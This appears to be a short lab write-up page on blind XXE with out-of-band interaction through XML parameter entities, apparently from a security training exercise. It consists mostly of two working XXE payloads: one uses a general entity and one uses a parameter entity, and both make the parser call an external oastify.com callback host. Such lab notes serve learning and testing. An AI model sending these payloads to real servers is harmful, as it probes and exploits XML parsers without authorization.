Blind XXE with out-of-band interaction via XML parameter entities
PreviousBlind XXE with out-of-band interactionNextExploiting blind XXE to exfiltrate data using a malicious external DTD
Last updated
Last updated
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://nmdveqrftmnnpfdt98ohgdez9qfi38rx.oastify.com"> ]>
<stockCheck><productId>&xxe</productId><storeId>1</storeId></stockCheck><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://7gof8alzn6h7jz7d3si1ax8j3a94xulj.oastify.com"> %xxe; ]>
<stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>